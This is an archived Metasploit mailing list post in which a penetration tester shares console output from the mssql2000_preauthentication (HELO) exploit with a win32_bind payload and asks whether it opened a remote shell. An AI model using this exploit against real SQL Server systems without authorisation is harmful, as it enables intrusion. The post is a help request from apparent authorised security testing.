Metasploit mailing list archives
Exploit MSSQL HELO vuln
From: joshuaperrymon at gmail.com (Josh L. Perrymon)
Date: Wed, 5 Apr 2006 13:11:51 +1000
Hey Guys,

I'm working on a penetration test and have found a MSSQL install vulnerable to the HELO exploit. Both networks are behind firewalls... (attacker and target)

I set up metasploit 2.5 with the exploit > Payload > and RHOST and LHOST info..

Exploit is sent using win32_bindshell

-------------------
msf mssql2000_preauthentication(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Saying hello to Microsoft SQL Server 2000 / MSDE 2000 (0x42b68aba / 0x42d01e50)
[*] Got connection from 127.0.0.1:2109 <-> 127.0.0.1:33334
[*] Exiting Bind Handler.
msf mssql2000_preauthentication(win32_bind) >
--------------------------

Does this mean the remote machine has a connection to my local machine? When I try telnetting to 127.0.0.1:33334 it has a blinking cursor then drops the connection????

I haven't used the bind_shell payload before because I usually have the ability to put myself outside the firewall when attempting exploits.

Thanks for the help...

JP
Current thread:
- Exploit MSSQL HELO vuln Josh L. Perrymon (Apr 04)
- Exploit MSSQL HELO vuln H D Moore (Apr 05)